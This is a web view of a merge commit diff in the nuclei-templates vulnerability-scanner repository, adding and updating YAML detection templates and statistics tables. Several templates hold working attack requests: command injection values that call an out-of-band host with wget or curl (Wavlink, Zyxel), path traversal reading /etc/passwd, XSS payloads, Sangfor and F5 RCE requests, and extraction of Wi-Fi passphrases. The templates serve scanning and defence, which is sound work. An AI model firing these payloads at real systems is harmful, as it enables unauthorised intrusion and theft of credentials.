daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into dashboard

patch-1
MostInterestingBotInTheWorld 2022-05-16 16:12:31 -04:00 committed by GitHub
parent a3f76e3d47 a6ff03b8a4
commit d064e64331
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
54 changed files with 2173 additions and 1572 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

31
.new-additions
View File

@ -1,20 +1,11 @@
cves/2018/CVE-2018-19326.yaml
cves/2020/CVE-2020-36510.yaml
cves/2022/CVE-2022-1040.yaml
cves/2022/CVE-2022-1221.yaml
cves/2022/CVE-2022-29548.yaml
exposed-panels/privx-panel.yaml
exposed-panels/umbraco-login.yaml
exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml
exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml
exposures/configs/msmtp-config.yaml
misconfiguration/unauthorized-h3csecparh-login.yaml
technologies/cloudflare-nginx-detect.yaml
technologies/dedecms-detect.yaml
technologies/ecology-detect.yaml
technologies/jspxcms-detect.yaml
vulnerabilities/other/ecsimagingpacs-rce.yaml
vulnerabilities/wordpress/age-gate-open-redirect.yaml
vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml
vulnerabilities/wordpress/wp-security-open-redirect.yaml
vulnerabilities/wordpress/wp-under-construction-ssrf.yaml
cnvd/2020/CNVD-2020-46552.yaml
cves/2021/CVE-2021-20123.yaml
cves/2021/CVE-2021-20124.yaml
cves/2021/CVE-2021-25075.yaml
cves/2022/CVE-2022-1392.yaml
cves/2022/CVE-2022-30489.yaml
misconfiguration/oracle-ebusiness-registration-enabled.yaml
misconfiguration/unauth-wavink-panel.yaml
technologies/kubernetes-operational-view-detect.yaml
vulnerabilities/wordpress/seo-redirection-xss.yaml
workflows/yonyou-nc-workflow.yaml

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1150 | daffainfo | 560 | cves | 1154 | info | 1183 | http | 3164 |
| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 870 | file | 68 |
| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 658 | network | 50 |
| xss | 363 | pdteam | 262 | technologies | 251 | critical | 411 | dns | 17 |
| wordpress | 358 | geeknik | 178 | exposures | 203 | low | 180 | | |
| exposure | 292 | dwisiswant0 | 168 | misconfiguration | 196 | unknown | 6 | | |
| rce | 289 | princechaddha | 130 | workflows | 186 | | | | |
| cve2021 | 283 | 0x_akoko | 129 | token-spray | 153 | | | | |
| tech | 265 | gy741 | 117 | default-logins | 95 | | | | |
| wp-plugin | 259 | pussycat0x | 116 | file | 68 | | | | |
| cve | 1156 | daffainfo | 560 | cves | 1160 | info | 1192 | http | 3187 |
| panel | 515 | dhiyaneshdk | 421 | exposed-panels | 523 | high | 874 | file | 68 |
| lfi | 461 | pikpikcu | 316 | vulnerabilities | 452 | medium | 662 | network | 50 |
| xss | 367 | pdteam | 262 | technologies | 255 | critical | 414 | dns | 17 |
| wordpress | 364 | geeknik | 179 | exposures | 204 | low | 183 | | |
| exposure | 293 | dwisiswant0 | 168 | misconfiguration | 197 | unknown | 6 | | |
| rce | 291 | princechaddha | 133 | workflows | 186 | | | | |
| cve2021 | 283 | 0x_akoko | 130 | token-spray | 154 | | | | |
| tech | 271 | gy741 | 118 | default-logins | 95 | | | | |
| wp-plugin | 264 | pussycat0x | 116 | file | 68 | | | | |
**260 directories, 3520 files**.
**261 directories, 3543 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

3021
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1150 | daffainfo | 560 | cves | 1154 | info | 1183 | http | 3164 |
| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 870 | file | 68 |
| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 658 | network | 50 |
| xss | 363 | pdteam | 262 | technologies | 251 | critical | 411 | dns | 17 |
| wordpress | 358 | geeknik | 178 | exposures | 203 | low | 180 | | |
| exposure | 292 | dwisiswant0 | 168 | misconfiguration | 196 | unknown | 6 | | |
| rce | 289 | princechaddha | 130 | workflows | 186 | | | | |
| cve2021 | 283 | 0x_akoko | 129 | token-spray | 153 | | | | |
| tech | 265 | gy741 | 117 | default-logins | 95 | | | | |
| wp-plugin | 259 | pussycat0x | 116 | file | 68 | | | | |
| cve | 1156 | daffainfo | 560 | cves | 1160 | info | 1192 | http | 3187 |
| panel | 515 | dhiyaneshdk | 421 | exposed-panels | 523 | high | 874 | file | 68 |
| lfi | 461 | pikpikcu | 316 | vulnerabilities | 452 | medium | 662 | network | 50 |
| xss | 367 | pdteam | 262 | technologies | 255 | critical | 414 | dns | 17 |
| wordpress | 364 | geeknik | 179 | exposures | 204 | low | 183 | | |
| exposure | 293 | dwisiswant0 | 168 | misconfiguration | 197 | unknown | 6 | | |
| rce | 291 | princechaddha | 133 | workflows | 186 | | | | |
| cve2021 | 283 | 0x_akoko | 130 | token-spray | 154 | | | | |
| tech | 271 | gy741 | 118 | default-logins | 95 | | | | |
| wp-plugin | 264 | pussycat0x | 116 | file | 68 | | | | |

25
cnvd/2020/CNVD-2020-46552.yaml Normal file
View File

@ -0,0 +1,25 @@
id: CNVD-2020-46552
info:
name: Sangfor EDR Tool - Remote Code Execution
author: ritikchaddha
severity: critical
description: There is a RCE vulnerability in Sangfor Endpoint Monitoring and Response Platform (EDR). An attacker could exploit this vulnerability by constructing an HTTP request, and an attacker who successfully exploited this vulnerability could execute arbitrary commands on the target host.
reference:
- https://www.modb.pro/db/144475
- https://blog.csdn.net/bigblue00/article/details/108434009
- https://cn-sec.com/archives/721509.html
tags: cnvd,cnvd2020,sangfor,rce
requests:
- method: GET
path:
- "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php"
matchers:
- type: dsl
dsl:
- 'contains(body, "$show_input = function($info)")'
- 'contains(body, "$strip_slashes($host)")'
- 'contains(body, "Log Helper")'
- 'status_code == 200'
condition: and

4
cnvd/2021/CNVD-2021-15822.yaml
View File

@ -6,6 +6,10 @@ info:
severity: high
reference:
- https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
metadata:
verified: true
shodan-query: title:"ShopXO企业级B2C电商系统提供商"
fofa-query: app="ShopXO企业级B2C电商系统提供商"
tags: shopxo,lfi,cnvd,cnvd2021
requests:

3
cnvd/2021/CNVD-2021-30167.yaml
View File

@ -7,7 +7,7 @@ info:
reference:
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
- https://www.cnvd.org.cn/webinfo/show/6491
tags: beanshell,rce,cnvd,cnvd2021
tags: beanshell,rce,cnvd,cnvd2021,yonyou
requests:
- raw:
@ -27,7 +27,6 @@ requests:
matchers-condition: and
matchers:
- type: regex
regex:
- "uid="

2
cves/2010/CVE-2010-0219.yaml
View File

@ -10,6 +10,8 @@ info:
- https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html
classification:
cve-id: CVE-2010-0219
metadata:
shodan-query: http.html:"Apache Axis"
tags: cve,cve2010,axis,apache,default-login,axis2
requests:

3
cves/2020/CVE-2020-11978.yaml
View File

@ -16,6 +16,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2020-11978
cwe-id: CWE-77
metadata:
verified: true
shodan-query: http.html:"Apache Airflow" || title:"Airflow - DAGs"
tags: cve,cve2020,apache,airflow,rce
requests:

2
cves/2020/CVE-2020-11991.yaml
View File

@ -15,6 +15,8 @@ info:
cve-id: CVE-2020-11991
cwe-id: CWE-611
remediation: Upgrade to Apache Cocoon 2.1.13 or later.
metadata:
shodan-query: http.html:"Apache Cocoon"
tags: cve,cve2020,apache,xml,cocoon,xxe
requests:

17
cves/2020/CVE-2020-13117.yaml
View File

@ -13,7 +13,10 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-13117
cwe-id: CWE-77
tags: cve,cve2020,wavlink,rce,oast
metadata:
verified: true
shodan-query: http.title:"Wi-Fi APP Login"
tags: cve,cve2020,wavlink,rce,oast,router
requests:
- raw:
@ -26,10 +29,20 @@ requests:
newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/05/16
- type: word
part: body
words:
- "parent.location.replace"
- type: status
status:
- 200
# Enhanced by mp on 2022/05/16

3
cves/2020/CVE-2020-13927.yaml
View File

@ -15,6 +15,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-13927
metadata:
verified: true
shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow"
tags: cve,cve2020,apache,airflow,unauth
requests:

44
cves/2021/CVE-2021-20123.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2021-20123
info:
name: Draytek VigorConnect - Unauthenticated Local File Inclusion DownloadFileServlet
author: 0x_Akoko
severity: high
description: |
A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
reference:
- https://www.tenable.com/security/research/tra-2021-42
- https://www.cvedetails.com/cve/CVE-2021-20123/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-20123
cwe-id: CWE-22
metadata:
verified: true
shodan-query: http.html:"VigorConnect"
tags: cve,cve2021,draytek,lfi,vigorconnect
requests:
- method: GET
path:
- "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything"
- "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "for 16-bit app support"
condition: or
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200

44
cves/2021/CVE-2021-20124.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2021-20124
info:
name: Draytek VigorConnect - Unauthenticated Local File Inclusion WebServlet
author: 0x_Akoko
severity: high
description: A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
reference:
- https://www.tenable.com/security/research/tra-2021-42
- https://www.draytek.com/products/vigorconnect/
- https://www.cvedetails.com/cve/CVE-2021-20124
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-20124
cwe-id: CWE-22
metadata:
verified: true
shodan-query: http.html:"VigorConnect"
tags: cve,cve2021,draytek,lfi,vigorconnect
requests:
- method: GET
path:
- "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd"
- "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "for 16-bit app support"
condition: or
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200

6
cves/2021/CVE-2021-21402.yaml
View File

@ -15,6 +15,10 @@ info:
cvss-score: 6.5
cve-id: CVE-2021-21402
cwe-id: CWE-22
metadata:
verified: true
shodan-query: http.html:"Jellyfin"
fofa-query: title="Jellyfin" || body="http://jellyfin.media"
tags: cve,cve2021,jellyfin,lfi
requests:
@ -34,4 +38,4 @@ requests:
- type: regex
regex:
- "\\[(font|extension|file)s\\]"
part: body
part: body

60
cves/2021/CVE-2021-25075.yaml Normal file
View File

@ -0,0 +1,60 @@
id: CVE-2021-25075
info:
name: WordPress Duplicate Page or Post < 1.5.1 - Stored XSS
author: DhiyaneshDK
severity: low
description: |
The plugin does not have any authorisation and has a flawed CSRF check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing any authenticated users, such as subscriber to call it and change the plugin's settings, or perform such attack via CSRF. Furthermore, due to the lack of escaping, this could lead to Stored Cross-Site Scripting issues.
remediation: Fixed in version 1.5.1.
reference:
- https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
cvss-score: 3.50
cve-id: CVE-2021-25075
cwe-id: CWE-862
tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
action=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p
- |
GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "style=animation-name:rotation onanimationstart=alert(/XSS/) p"
- "toplevel_page_wpda_duplicate_post_menu"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

1
cves/2021/CVE-2021-38540.yaml
View File

@ -14,6 +14,7 @@ info:
cve-id: CVE-2021-38540
cwe-id: CWE-306
metadata:
verified: true
shodan-query: title:"Sign In - Airflow"
tags: cve,cve2021,apache,airflow,rce

3
cves/2021/CVE-2021-44451.yaml
View File

@ -11,6 +11,9 @@ info:
classification:
cve-id: CVE-2021-44451
remediation: Users should upgrade to Apache Superset 1.4.0 or higher.
metadata:
verified: true
shodan-query: title:"Superset"
tags: cve,cve2021,apache,superset,default-login
requests:

5
cves/2022/CVE-2022-1388.yaml
View File

@ -25,6 +25,7 @@ info:
variables:
auth: "admin:"
cmd: "echo CVE-2022-1388 | rev"
requests:
- raw:
@ -54,10 +55,6 @@ requests:
"utilCmdArgs": "-c '{{cmd}}'"
}
payloads:
cmd:
- 'echo CVE-2022-1388 | rev'
stop-at-first-match: true
matchers-condition: and
matchers:

36
cves/2022/CVE-2022-1392.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2022-1392
info:
name: Videos sync PDF <= 1.7.4 - Unauthenticated LFI
author: Veshraj
severity: high
description: The plugin does not validate the p parameter before using it in an include statement, which could lead to Local File Inclusion issues.
reference:
- https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815
- https://packetstormsecurity.com/files/166534/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1392
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-1392
metadata:
verified: true
tags: lfi,wp-plugin,cve,cve2022,wp,wordpress,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "failed to open stream: No such file or directory"
- "REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php"
condition: and
- type: status
status:
- 200

3
cves/2022/CVE-2022-24288.yaml
View File

@ -15,7 +15,8 @@ info:
cve-id: CVE-2022-24288
cwe-id: CWE-78
metadata:
shodan-query: title:"Airflow - DAGs"
verified: true
shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow"
tags: cve,cve2022,airflow,rce
requests:

40
cves/2022/CVE-2022-30489.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2022-30489
info:
name: Wavlink Wn535g3 - POST XSS
author: For3stCo1d
severity: high
reference:
- https://github.com/badboycxcc/XSS-CVE-2022-30489
- https://nvd.nist.gov/vuln/detail/CVE-2022-30489
metadata:
verified: true
shodan-query: http.title:"Wi-Fi APP Login"
tags: xss,cve2022,wavlink,cve,router,iot
description: "WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi."
requests:
- raw:
- |
POST /cgi-bin/login.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
newUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")</script><script>alert(document.domain);</script>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn
matchers-condition: and
matchers:
- type: word
words:
- '<script>alert(document.domain);</script>'
- 'parent.location.replace("http://")'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

35
cves/2022/CVE-2022-30525.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2022-30525
info:
name: Zyxel Firewall - Unauthenticated RCE
author: h1ei1,prajiteshsingh
severity: critical
description: |
The vulnerability affects Zyxel firewalls that support Zero Touch Provisioning (ZTP), including the ATP Series, VPN Series, and USG FLEX Series (including USG20-VPN and USG20W-VPN), allowing an unauthenticated remote attacker to target the affected device as nobody Execute arbitrary code as a user on.
reference:
- https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
- https://github.com/rapid7/metasploit-framework/pull/16563
- https://nvd.nist.gov/vuln/detail/CVE-2022-30525
metadata:
shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700"
tags: rce,zyxel,cve,cve2022,firewall,unauth
requests:
- raw:
- |
POST /ztp/cgi-bin/handler HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{interactsh-url}};","data":"hi"}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: status
status:
- 500

2
exposed-panels/adobe/adobe-component-login.yaml
View File

@ -9,6 +9,8 @@ info:
- https://www.exploit-db.com/ghdb/6846
classification:
cwe-id: CWE-200
metadata:
shodan-query: http.component:"Adobe ColdFusion"
tags: panel,adobe,coldfusion
requests:

2
exposures/files/cold-fusion-cfcache-map.yaml
View File

@ -6,6 +6,8 @@ info:
severity: low
reference:
- https://securiteam.com/windowsntfocus/5bp081f0ac/
metadata:
shodan-query: http.component:"Adobe ColdFusion"
tags: exposure,coldfusion,adobe
requests:

2
miscellaneous/unpatched-coldfusion.yaml
View File

@ -7,6 +7,8 @@ info:
reference:
- https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html
- https://twitter.com/Daviey/status/1374070630283415558
metadata:
shodan-query: http.component:"Adobe ColdFusion"
tags: rce,adobe,misc,coldfusion
requests:

3
misconfiguration/airflow/airflow-debug.yaml
View File

@ -4,6 +4,9 @@ info:
name: Airflow Debug Trace
author: pdteam
severity: low
metadata:
verified: true
shodan-query: title:"Airflow - DAGs"
tags: apache,airflow,fpd
requests:

32
misconfiguration/oracle-ebusiness-registration-enabled.yaml Normal file
View File

@ -0,0 +1,32 @@
id: oracle-ebusiness-registration-enabled
info:
name: Oracle E-Business Login Panel Registration Accessible
author: 3th1c_yuk1,tess
severity: info
description: Oracle E-Business Login Panel Registration Accessible.
reference:
- https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac
- https://twitter.com/GodfatherOrwa/status/1514720677173026816
metadata:
verified: true
shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200
tags: oracle,misconfig
requests:
- method: GET
path:
- '{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp'
matchers-condition: and
matchers:
- type: word
words:
- 'Registration'
- 'Register as individual'
- '<!-- ibeCZzpRuntimeIncl.jsp end -->'
condition: and
- type: status
status:
- 200

44
misconfiguration/unauth-wavink-panel.yaml Normal file
View File

@ -0,0 +1,44 @@
id: unauth-wavink-panel
info:
name: Unauthenticated Wavlink Panel
author: princechaddha
severity: high
metadata:
verified: true
shodan-query: http.title:"Wi-Fi APP Login"
tags: exposure,wavlink,unauth,misconfig,router
requests:
- method: GET
path:
- "{{BaseURL}}/wifi_base.shtml"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>APP</title>"
- type: regex
part: body
regex:
- 'var passphraseKey12="(.*)";'
- type: word
part: body
negative: true
words:
- 'var passphraseKey12="";'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- 'var passphraseKey12="(.*)";'

3
technologies/apache/airflow-detect.yaml
View File

@ -4,6 +4,9 @@ info:
name: Apache Airflow
author: pdteam
severity: info
metadata:
verified: true
shodan-query: http.html:"Apache Airflow"
tags: tech,apache,airflow
requests:

3
technologies/apache/apache-axis-detect.yaml
View File

@ -5,6 +5,9 @@ info:
author: dogasantos
severity: info
description: Axis and Axis2 detection
metadata:
verified: true
shodan-query: http.html:"Apache Axis"
tags: tech,axis2,middleware,apache
requests:

2
technologies/apache/apache-cocoon-detect.yaml
View File

@ -5,6 +5,8 @@ info:
author: ffffffff0x
severity: info
metadata:
verified: true
shodan-query: http.html:"Apache Cocoon"
fofa-query: app="APACHE-Cocoon"
tags: apache,cocoon,tech

5
technologies/favicon-detection.yaml
View File

@ -2600,3 +2600,8 @@ requests:
name: "Gradle-enterprise"
dsl:
- "status_code==200 && (\"1614287628\" == mmh3(base64_py(body)))"
- type: dsl
name: "Kubernetes-Operational-View"
dsl:
- "status_code==200 && (\"2130463260\" == mmh3(base64_py(body)))"

2
technologies/fingerprinthub-web-fingerprints.yaml
View File

@ -14461,7 +14461,7 @@ requests:
- /yimioa.apk
- type: word
name: yongyou-ism
name: yonyou-ism
words:
- sheight*window.screen.deviceydpi

3
technologies/jellyfin-detect.yaml
View File

@ -4,6 +4,9 @@ info:
name: Jellyfin detected
author: dwisiswant0
severity: info
metadata:
verified: true
shodan-query: http.html:"Jellyfin"
tags: tech,jellyfin
requests:

16
technologies/kong-detect.yaml
View File

@ -2,7 +2,7 @@ id: kong-detect
info:
name: Detect Kong
author: geeknik
author: geeknik,joshlarsen
severity: info
description: The Cloud-Native API Gateway
reference:
@ -14,16 +14,18 @@ requests:
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: regex
- type: word
part: header
regex:
- "[Ss]erver: [Kk]ong+"
words:
- "server: kong"
- "x-kong-response-latency"
- "x-kong-upstream-latency"
- "x-kong-proxy-latency"
condition: or
case-insensitive: true
extractors:
- type: kval
part: header
kval:
- server

34
technologies/kubernetes-operational-view-detect.yaml Normal file
View File

@ -0,0 +1,34 @@
id: kubernetes-operational-view-detect
info:
name: Kubernetes Operational View Detect
author: idealphase
severity: info
reference:
- https://github.com/hjacobs/kube-ops-view
- https://codeberg.org/hjacobs/kube-ops-view
metadata:
verified: true
shodan-query: http.title:"Kubernetes Operational View"
tags: tech,k8s,kubernetes,devops,kube
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- "<title>Kubernetes Operational View"
- type: status
status:
- 200
extractors:
- type: regex
group: 1
regex:
- '<title>Kubernetes Operational View (.+)<\/title>'

6
token-spray/api-loqate.yaml
View File

@ -17,6 +17,8 @@ requests:
matchers:
- type: word
part: body
negative: true
words:
- 'Unknown key'
- '"Id":'
- '"Type":'
- '"Text":'
condition: and

22
token-spray/api-moonpay.yaml Normal file
View File

@ -0,0 +1,22 @@
id: api-moonpay
info:
name: MoonPay API Test
author: 0ri2N
severity: info
reference:
- https://dashboard.moonpay.com/getting_started
tags: token-spray,moonpay,cryptocurrencies
self-contained: true
requests:
- method: GET
path:
- "https://api.moonpay.com/v3/currencies/btc/buy_quote?apiKey={{token}}&baseCurrencyAmount=1"
matchers:
- type: word
part: body
words:
- '"accountId":'
condition: and

2
vulnerabilities/ecology/ecology-arbitrary-file-upload.yaml
View File

@ -6,6 +6,8 @@ info:
severity: medium
reference:
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
metadata:
fofa-query: app="泛微-协同办公OA"
tags: ecology,upload,fileupload,intrusive
requests:

2
vulnerabilities/other/coldfusion-debug-xss.yaml
View File

@ -7,6 +7,8 @@ info:
description: The remote Adobe ColdFusion debug page has been left open to unauthenticated users, this could allow remote attackers to trigger a reflected cross site scripting against the visitors of the site.
reference:
- https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml
metadata:
shodan-query: http.component:"Adobe ColdFusion"
tags: adobe,coldfusion,xss
requests:

3
vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml
View File

@ -7,6 +7,9 @@ info:
description: A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter.
reference:
- https://www.cnblogs.com/milantgh/p/3615986.html
metadata:
verified: true
shodan-query: http.html:"power by dedecms" || title:"dedecms"
tags: dedecms
requests:

3
vulnerabilities/other/dedecms-openredirect.yaml
View File

@ -6,6 +6,9 @@ info:
severity: low
reference:
- https://blog.csdn.net/ystyaoshengting/article/details/82734888
metadata:
verified: true
shodan-query: http.html:"power by dedecms" || title:"dedecms"
tags: dedecms,redirect
requests:

2
vulnerabilities/other/ecology-filedownload-directory-traversal.yaml
View File

@ -4,6 +4,8 @@ info:
name: Ecology Directory Traversal
author: princechaddha
severity: medium
metadata:
fofa-query: app="泛微-协同办公OA"
tags: ecology,lfi
requests:

2
vulnerabilities/other/ecology-syncuserinfo-sqli.yaml
View File

@ -6,6 +6,8 @@ info:
severity: high
reference:
- https://www.weaver.com.cn/
metadata:
fofa-query: app="泛微-协同办公OA"
tags: ecology,sqli
requests:

2
vulnerabilities/other/ecology-v8-sqli.yaml
View File

@ -6,6 +6,8 @@ info:
severity: high
reference:
- http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20V8%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
metadata:
fofa-query: app="泛微-协同办公OA"
tags: ecology,sqli
requests:

35
vulnerabilities/other/gnuboard-sms-xss.yaml Normal file
View File

@ -0,0 +1,35 @@
id: gnuboard-sms-xss
info:
name: Gnuboard CMS - SMS Emoticon XSS
author: gy741
severity: medium
description: A vulnerability in Gnuboard CMS allows remote attackers to inject arbitrary Javascript into the responses returned by the server.
reference:
- https://sir.kr/g5_pds/4788?page=5
- https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3
metadata:
verified: true
shodan-query: http.html:"Gnuboard"
tags: xss,gnuboard
requests:
- method: GET
path:
- "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard<svg+onload=alert(document.domain)>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"0nuboard<svg onload=alert(document.domain)>"'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

2
vulnerabilities/other/natshell-path-traversal.yaml
View File

@ -6,6 +6,8 @@ info:
severity: high
reference:
- https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw
metadata:
fofa-query: title="蓝海卓越计费管理系统"
tags: natshell,lfi
requests:

6
vulnerabilities/other/tamronos-rce.yaml
View File

@ -12,7 +12,11 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-78
tags: tamronos,rce
metadata:
verified: true
shodan-query: title:"TamronOS IPTV系统"
fofa-query: title="TamronOS IPTV系统"
tags: tamronos,rce
requests:
- method: GET

6
vulnerabilities/other/yongyou-u8-oa-sqli.yaml → vulnerabilities/other/yonyou-u8-oa-sqli.yaml
View File

@ -1,12 +1,12 @@
id: yongyou-u8-oa-sqli
id: yonyou-u8-oa-sqli
info:
name: Yongyou U8 OA Sqli
name: Yonyou U8 OA Sqli
author: ritikchaddha
severity: high
reference:
- http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
